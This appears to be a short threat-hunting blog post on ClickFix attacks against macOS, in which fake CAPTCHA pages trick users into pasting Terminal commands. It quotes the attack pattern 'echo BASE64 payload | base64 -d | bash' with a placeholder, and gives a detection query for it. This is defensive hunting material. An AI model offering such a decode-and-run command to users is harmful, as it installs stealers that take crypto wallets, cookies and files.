208. Hunting for ClickFix on macOS

Hello everyone!

You think that ClickFix technique is used only to attack Windows-based systems? It's not true. The adversaries also use it to attack macOS!

Hunt.io shared a report on a recent phishing campaing targeting macOS users. The adversary leveraged fake CAPTCHA to trick victims to run Terminal commands.

According to the report, the pasted command typically starts with:

echo 'BASE64_ENCODED_PAYLOAD' | base64 -d | bash

So, we can use it to build a query for our hunting mission:

event_type: "processcreatemac"

AND

cmdline: ("echo" AND "base64" AND "bash")

The command runs a hidden script that can steal crypto wallets, cookies, and sensitive files.

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

082. Huniting for Malicious Browser Extensions

001. The Zeltser Challenge